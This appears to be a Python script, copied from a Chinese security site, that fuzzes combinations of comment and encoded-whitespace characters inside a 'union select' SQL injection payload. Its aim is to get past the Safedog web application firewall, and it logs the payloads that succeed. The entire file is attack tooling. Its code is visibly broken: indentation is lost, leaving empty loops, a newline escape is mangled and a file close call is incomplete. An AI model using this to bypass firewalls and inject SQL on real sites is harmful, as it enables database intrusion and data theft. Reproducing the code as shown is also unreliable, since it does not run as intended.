从freebuf copy过来的,先保存,有空再改
#encoding=utf-8
import requests
url = "http://127.0.0.1/index.php?id=1"
Fuzz_a = ['/*!','*/','/**/','/','?','~','!','.','%','-','*','+','=']
Fuzz_b = ['']
Fuzz_c = ['%0a','%0b','%0c','%0d','%0e','%0f','%0h','%0i','%0j']
FUZZ = Fuzz_a+Fuzz_b+Fuzz_c
#配置fuzz字典
header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'}
#设置请求的headers
for a in FUZZ:
pass
for b in FUZZ:
pass
for c in FUZZ:
for d in FUZZ:
pass
for e in FUZZ:
pass
PYLOAD = "/*!union"+a+b+c+d+e+"select*/ 1,2"
urlp = url+PYLOAD
res = requests.get(urlp,headers=header)
#使用for排列组合fuzz字典并请求页面
if 'flag' in res.text: #这个flag需要改,根据你测的正常页面中,有什么字段是必然出现的
print ("[*]URL:"+ urlp +"过狗!")
f=open('result.txt','a')
f.write(urlp+"n")
f.close